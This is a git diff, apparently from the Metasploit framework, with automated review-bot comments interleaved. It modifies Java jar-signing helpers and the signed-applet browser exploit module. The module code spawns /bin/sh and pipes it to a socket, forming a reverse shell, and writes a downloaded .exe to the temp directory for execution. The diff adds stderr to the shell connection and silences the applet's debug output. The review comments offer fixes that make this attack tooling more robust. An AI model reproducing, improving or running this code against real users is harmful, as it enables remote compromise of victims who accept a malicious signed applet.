diff --git a/data/exploits/msfJavaToolkit.jar b/data/exploits/msfJavaToolkit.jar
index 08d0425ea0..2d5d734930 100644
Binary files a/data/exploits/msfJavaToolkit.jar and b/data/exploits/msfJavaToolkit.jar differ
diff --git a/external/source/msfJavaToolkit/compile.sh b/external/source/msfJavaToolkit/compile.sh
index bbb29feb4d..e490fb21ee 100755
--- a/external/source/msfJavaToolkit/compile.sh
+++ b/external/source/msfJavaToolkit/compile.sh
@@ -1,7 +1,7 @@
 #!/bin/bash
-javac -classpath $JAVA_HOME/lib/tools.jar:. javaCompile/*.java sun/security/tools/*.java
+javac -classpath $JAVA_HOME/lib/tools.jar:. javaCompile/*.java
-jar -cf msfJavaToolkit.jar javaCompile/*.class sun/security/tools/*.class
+jar -cf msfJavaToolkit.jar javaCompile/*.class
 mv msfJavaToolkit.jar ../../../data/exploits/
diff --git a/external/source/msfJavaToolkit/javaCompile/CompileSourceInMemory.class b/external/source/msfJavaToolkit/javaCompile/CompileSourceInMemory.class
deleted file mode 100644
index 31dbb0a8f2..0000000000
Binary files a/external/source/msfJavaToolkit/javaCompile/CompileSourceInMemory.class and /dev/null differ
diff --git a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.class b/external/source/msfJavaToolkit/javaCompile/CreateJarFile.class
deleted file mode 100644
index a6a1cce13a..0000000000
Binary files a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.class and /dev/null differ
diff --git a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java b/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java
index 95be0e243c..05f7bf3e0b 100644
--- a/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java
+++ b/external/source/msfJavaToolkit/javaCompile/CreateJarFile.java
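Review bot: The script has no error handling, so when the `javac` line fails the `jar` and `mv` lines still run and overwrite data/exploits/msfJavaToolkit.jar with an archive built from whatever .class files happen to be on disk — and since this commit also deletes the tracked .class files, a failed compile on a fresh checkout has nothing to package. Add `set -eu` directly after the shebang so the build stops at the first failure (and at an unset JAVA_HOME), and quote the expansion: `javac -classpath "$JAVA_HOME/lib/tools.jar:." javaCompile/*.java`. The hunk spans the whole script.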
@@ -22,7 +22,7 @@ public class CreateJarFile {
 if (tobeJared[i] == null || !tobeJared[i].exists() || tobeJared[i].isDirectory()) continue; // Just in case...
- System.out.println("Adding " + tobeJared[i].getName());
+ //System.out.println("Adding " + tobeJared[i].getName());
 // Add archive entry
 JarEntry jarAdd = new JarEntry(tobeJared[i].getName());
@@ -42,7 +42,7 @@ public class CreateJarFile {
 out.close(); stream.close();
- System.out.println("Adding completed OK");
+ //System.out.println("Adding completed OK");
 } catch (Exception ex) { ex.printStackTrace(); System.out.println("Error: " + ex.getMessage());
diff --git a/external/source/msfJavaToolkit/javaCompile/JavaSourceFromString.class b/external/source/msfJavaToolkit/javaCompile/JavaSourceFromString.class
deleted file mode 100644
index 1b451a4f56..0000000000
Binary files a/external/source/msfJavaToolkit/javaCompile/JavaSourceFromString.class and /dev/null differ
diff --git a/external/source/msfJavaToolkit/javaCompile/SignJar.java b/external/source/msfJavaToolkit/javaCompile/SignJar.java
new file mode 100644
index 0000000000..2b487c03f2
--- /dev/null
+++ b/external/source/msfJavaToolkit/javaCompile/SignJar.java
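Review bot: In the second hunk (`@@ -42`), `out.close()` and `stream.close()` run inside the try body rather than in a `finally`, so any exception raised while adding entries leaves both streams open and a partially written jar on disk; move the two closes into a `finally` block (guarded against null) so they run on the failure path as well. The `catch (Exception ex)` that follows prints the trace and an `Error:` line and then continues, so a caller cannot tell that the jar is incomplete — rethrow with `ex` as the cause, or return a failure indication; the method's signature and return are outside this hunk, so I cannot see which fits. Commenting out the two println lines (both hunks) leaves dead code; delete them rather than keep them as comments. The enclosing method begins and ends outside both hunks.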
@@ -0,0 +1,54 @@
+// Based on the example from http://www.java2s.com/Code/Java/JDK-6/CompilingfromMemory.htm
+
+package javaCompile;
+
+import java.io.PrintStream;
+import java.io.FilterOutputStream;
+import java.io.ByteArrayOutputStream;
+import java.io.OutputStream;
+import java.io.IOException;
+import sun.security.tools.KeyTool;
+import sun.security.tools.JarSigner;
+
+public class SignJar {
+
+ static PrintStream filteredstream =
+ new PrintStream(
+ new FilteredStream(
+ new ByteArrayOutputStream()));
+
+ public static void KeyToolMSF( String[] args ) {
+ try {
+ RedirectStd();
+ KeyTool.main( args );
+ } catch( Exception ex ) { ex.printStackTrace(); }
+ }
+
+ public static void JarSignerMSF( String[] args ) {
+ try {
+ RedirectStd();
+ JarSigner.main( args );
+ } catch( Exception ex ) { ex.printStackTrace(); }
+ }
+
+ private static void RedirectStd() {
+ try {
+ System.setOut( filteredstream );
+ System.setErr( filteredstream );
+ } catch( Exception ex ) { ex.printStackTrace(); }
+ }
+
+ static class FilteredStream extends FilterOutputStream {
+ public FilteredStream( OutputStream aStream ) { super ( aStream ); }
+
+ public void write( byte b[] ) throws IOException {
+ String aString = new String( b );
+ // Do stuff with the output.
+ }
+
+ public void write( byte b[], int off, int len) throws IOException {
+ String aString = new String( b, off, len );
+ // Do stuff with the output.
+ }
+ }
+}
diff --git a/external/source/msfJavaToolkit/output.jar b/external/source/msfJavaToolkit/output.jar
index 3bba37093d..996edd281e 100644
Binary files a/external/source/msfJavaToolkit/output.jar and b/external/source/msfJavaToolkit/output.jar differ
diff --git a/external/source/msfJavaToolkit/testCompilation.rb b/external/source/msfJavaToolkit/testCompilation.rb
index 8011270b18..105179ce18 100755
--- a/external/source/msfJavaToolkit/testCompilation.rb
+++ b/external/source/msfJavaToolkit/testCompilation.rb
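Review bot: `RedirectStd()` swaps `System.out` and `System.err` for the whole JVM and nothing ever restores them, so from the first `KeyToolMSF` call onward every later Java-side message in the hosting process is discarded — including the `ex.printStackTrace()` in the catch blocks of `KeyToolMSF` and `JarSignerMSF`, which by then writes into the sink, making a keytool or jarsigner failure (wrong store password, missing input jar) completely silent. Capture the original streams before redirecting, report on the saved stderr, and restore them in a `finally`, as below. `FilteredStream` overrides only the two array `write` overloads, so a direct single-byte `write(int)` still reaches the `ByteArrayOutputStream`, which is never drained and lives as long as the class — add `public void write( int b ) throws IOException { }` and drop the unused `aString` locals. If `KeyTool.main`/`JarSigner.main` call `System.exit` on error (I believe older JDK builds do; worth confirming for the targeted versions) the catch never runs and the hosting process terminates, which no amount of stream redirection guards against. Style: `KeyToolMSF`, `JarSignerMSF` and `RedirectStd` are methods and would conventionally be lowerCamelCase, though the Ruby callers pin the first two names.
```java
    public static void KeyToolMSF( String[] args ) {
        PrintStream savedOut = System.out;
        PrintStream savedErr = System.err;
        RedirectStd();
        try {
            KeyTool.main( args );
        } catch( Exception ex ) {
            ex.printStackTrace( savedErr );   // the sink would swallow this
        } finally {
            System.setOut( savedOut );
            System.setErr( savedErr );
        }
    }

    // … unchanged: JarSignerMSF, same shape around JarSigner.main( args ) …
```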
@@ -8,7 +8,8 @@ Rjb::load("#{ENV['JAVA_HOME']}/lib/tools.jar:.",jvmargs=[])
 clsJavaCompile = Rjb::import('javaCompile.CompileSourceInMemory')
 clsCreateJar = Rjb::import('javaCompile.CreateJarFile')
-clsFile = Rjb::import('java.io.File')
+clsFile = Rjb::import('java.io.File')
+system = Rjb::import('java.lang.System')
 #clsString = Rjb::import('java.lang.String')
 classNames = [ "HelloWorld1", "HelloWorld2" ]
@@ -24,7 +25,8 @@ public class #{name} {
 }^} #compileOpts = [""]
-outputDir = "testoutdir"
+#outputDir = system.getProperty('java.io.tmpdir')
+outputDir = "testoutdir"
 compileOpts = [ "-target", "1.3", "-source", "1.3", "-d", outputDir ]
 success = clsJavaCompile._invoke('CompileFromMemory','[Ljava.lang.String;[Ljava.lang.String;[Ljava.lang.String;', classNames, codez, compileOpts)
diff --git a/external/source/msfJavaToolkit/testKeytool.rb b/external/source/msfJavaToolkit/testKeytool.rb
index 7ed76c9929..600ecae132 100755
--- a/external/source/msfJavaToolkit/testKeytool.rb
+++ b/external/source/msfJavaToolkit/testKeytool.rb
@@ -9,13 +9,15 @@ Rjb::load(ENV['JAVA_HOME'] + '/lib/tools.jar:.',jvmargs=[])
 # versions of the JDK. Need to find a better way to use sun.security.tools.KeyTool
 # and .JarSigner than modifying the source. These rely on internal APIs that may
 # change.
-clsKeyTool = Rjb::import('sun.security.tools.KeyTool')
+signer = Rjb::import('javaCompile.SignJar')
+#clsKeyTool = Rjb::import('sun.security.tools.KeyTool')
 #clsKeyTool = Rjb::import('sun.security.tools.KeyToolMSF')
-clsJarSigner = Rjb::import('sun.security.tools.JarSigner')
+#clsJarSigner = Rjb::import('javaCompile.SignJar.JarSignerMSF')
+#clsJarSigner = Rjb::import('sun.security.tools.JarSigner')
 #clsJarSigner = Rjb::import('sun.security.tools.JarSignerMSF')
-keytool = clsKeyTool
-jarsigner = clsJarSigner
+#keytool = clsKeyTool
+#jarsigner = clsJarSigner
 outputJar = "output.jar"
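Review bot: `system = Rjb::import('java.lang.System')` shadows Ruby's `Kernel#system` for the rest of the script, and its only use is the commented-out `#outputDir = system.getProperty('java.io.tmpdir')` in the second hunk, so it is dead code with a hazardous name; either drop it or rename it, e.g. `clsSystem = Rjb::import('java.lang.System')`. The `clsFile` line is removed and re-added with identical text as shown here, which only adds noise to the diff (if it is a whitespace fix, that is worth a word in the commit message).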
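Review bot: The hunk adds four more commented-out alternatives (`#clsKeyTool = ...`, `#clsJarSigner = Rjb::import('javaCompile.SignJar.JarSignerMSF')`, `#keytool = clsKeyTool`, `#jarsigner = clsJarSigner`) next to the two that were already there; now that `signer = Rjb::import('javaCompile.SignJar')` is the single path in use, delete the dead variants rather than accumulating them, and note that `javaCompile.SignJar.JarSignerMSF` names a method, not a class, so that line could never have worked. The comment above about depending on internal `sun.security.tools` APIs still applies — `SignJar` only moves the dependency into the toolkit jar — so update it to say that the dependency now lives in `javaCompile/SignJar.java`.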
@@ -30,13 +32,13 @@ keytoolOpts = ["-genkey", "-alias", "signFiles",
 "-keystore", "msfkeystore", "-keypass", "msfkeypass"]
-keytool._invoke('main','[Ljava.lang.String;',keytoolOpts)
+signer._invoke('KeyToolMSF','[Ljava.lang.String;',keytoolOpts)
 jarsignerOpts = ["-keystore", "msfkeystore", "-storepass", "msfstorepass", "-keypass", "msfkeypass", "-signedJar", "s#{outputJar}", outputJar, "signFiles"]
-jarsigner._invoke('main','[Ljava.lang.String;',jarsignerOpts)
+signer._invoke('JarSignerMSF','[Ljava.lang.String;',jarsignerOpts)
diff --git a/external/source/msfJavaToolkit/testoutdir/HelloWorld1.class b/external/source/msfJavaToolkit/testoutdir/HelloWorld1.class
deleted file mode 100644
index d02040fda4..0000000000
Binary files a/external/source/msfJavaToolkit/testoutdir/HelloWorld1.class and /dev/null differ
diff --git a/external/source/msfJavaToolkit/testoutdir/HelloWorld2.class b/external/source/msfJavaToolkit/testoutdir/HelloWorld2.class
deleted file mode 100644
index eaa1ea1639..0000000000
Binary files a/external/source/msfJavaToolkit/testoutdir/HelloWorld2.class and /dev/null differ
diff --git a/lib/msf/core/exploit/java.rb b/lib/msf/core/exploit/java.rb
index 88dcc53a99..2cf877768f 100644
--- a/lib/msf/core/exploit/java.rb
+++ b/lib/msf/core/exploit/java.rb
@@ -123,8 +123,7 @@ module Exploit::Java
 def sign_jar(cert_cn, unsiged_jar, signed_jar, cert_alias="signFiles", msf_keystore="msfkeystore", msf_store_pass="msfstorepass", msf_key_pass="msfkeypass") # Dependent on $JAVA_HOME/lib/tools.jar that comes with the JDK.
-keytool_klass = Rjb::import('sun.security.tools.KeyTool')
-jarsigner_klass = Rjb::import('sun.security.tools.JarSigner')
+signer_klass = Rjb::import('javaCompile.SignJar')
 # Check if the keystore exists from previous run. If it does, delete it.
 msf_keystore = File.join(datastore['JAVACACHE'], msf_keystore)
@@ -136,14 +135,14 @@ module Exploit::Java
 "-keypass", "msfkeypass"] # Build the cert keystore
-keytool_klass._invoke('main','[Ljava.lang.String;',keytool_opts)
+signer_klass._invoke('KeyToolMSF','[Ljava.lang.String;',keytool_opts)
 jarsigner_opts = ["-keystore", msf_keystore, "-storepass", msf_store_pass, "-keypass", msf_key_pass, "-signedJar", File.join(datastore['JAVACACHE'], signed_jar), # Signed Jar
 File.join(datastore['JAVACACHE'], unsiged_jar), # Input Jar we're signing
 cert_alias] # The cert we're using
-jarsigner_klass._invoke('main','[Ljava.lang.String;',jarsigner_opts)
+signer_klass._invoke('JarSignerMSF','[Ljava.lang.String;',jarsigner_opts)
 # There are warnings in the source for KeyTool/JarSigner warning that security providers
 # are not released, and if you are calling .main(foo) from another app, you need to release
diff --git a/modules/exploits/multi/browser/java_signed_applet.rb b/modules/exploits/multi/browser/java_signed_applet.rb
index 983d810af6..4da6660e11 100644
--- a/modules/exploits/multi/browser/java_signed_applet.rb
+++ b/modules/exploits/multi/browser/java_signed_applet.rb
@@ -154,10 +154,10 @@ public class #{datastore['APPLETNAME']} extends Applet
 data = ""; }
- System.out.println("Applet executing. Creating payload class.");
+ //System.out.println("Applet executing. Creating payload class.");
 #{datastore['PAYLOADNAME']} site = new #{datastore['PAYLOADNAME']} ();
- System.out.println("Payload class instantiated.");
+ //System.out.println("Payload class instantiated.");
 site.data = data; if( lhost != null && lport != null) {
@@ -167,7 +167,7 @@ public class #{datastore['APPLETNAME']} extends Applet
 System.out.println("lport: " + Integer.parseInt(lport)); }
- System.out.println("data: " + data);
+ //System.out.println("data: " + data);
 site.run(); }
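Review bot: Both `signer_klass._invoke(...)` calls return nothing, and `SignJar` catches every exception internally while also redirecting the JVM's stdout/stderr into a discarding stream, so `sign_jar` now has no way to notice that keytool or jarsigner failed, whereas the previous direct `.main` invocations at least had a chance to surface a Java exception through Rjb. After the `JarSignerMSF` invoke, verify the output and fail loudly otherwise: `signed_path = File.join(datastore['JAVACACHE'], signed_jar)` / `raise "jarsigner did not produce #{signed_path}" unless File.exist?(signed_path)`. The `unsiged_jar` spelling in the context lines predates this commit but is worth correcting while the call sites are being touched. `sign_jar` continues past the end of the hunk.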
@@ -237,7 +237,7 @@ public class #{datastore['APPLETNAME']} extends Applet
 public Object run() throws Exception {
- System.out.println("Applet running...");
+ //System.out.println("Applet running...");
 try {
@@ -248,7 +248,7 @@ public class #{datastore['APPLETNAME']} extends Applet
 //if( #{datastore['PAYLOADNAME']}.data.length() == 0 )
 if( this.data.length() == 0 ) {
- System.out.println("Applet thinks payload.data is empty.");
+ //System.out.println("Applet thinks payload.data is empty.");
 Socket client_socket = null; String shell = "/bin/sh";
@@ -274,16 +274,18 @@ public class #{datastore['APPLETNAME']} extends Applet
 Process process = Runtime.getRuntime().exec( shell );
 ( new StreamConnector( process.getInputStream(), client_socket.getOutputStream() ) ).start();
+
+ ( new StreamConnector( process.getErrorStream(), client_socket.getOutputStream() ) ).start();
 ( new StreamConnector( client_socket.getInputStream(), process.getOutputStream() ) ).start(); } } else {
- System.out.println("Applet knows there's data to write. Writing to: " + System.getProperty( "java.io.tmpdir" ));
+ //System.out.println("Applet knows there's data to write. Writing to: " + System.getProperty( "java.io.tmpdir" ));
 String filename = Math.random() + ".exe"; String path = System.getProperty( "java.io.tmpdir" ) + File.separator + filename;
- System.out.println(filename + " written.");
+ //System.out.println(filename + " written.");
 Process p; FileOutputStream fos = new FileOutputStream( path );
@@ -409,7 +411,7 @@ public class #{datastore['APPLETNAME']} extends Applet
 fd.close end
- print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}..." )
+ print_status( "Sending #{datastore['APPLETNAME']}.jar to #{cli.peerhost}:#{cli.peerport}. Waiting for user to click 'accept'..." )
 send_response( cli, @jar_data, { 'Content-Type' => "application/octet-stream" } )
 handler( cli )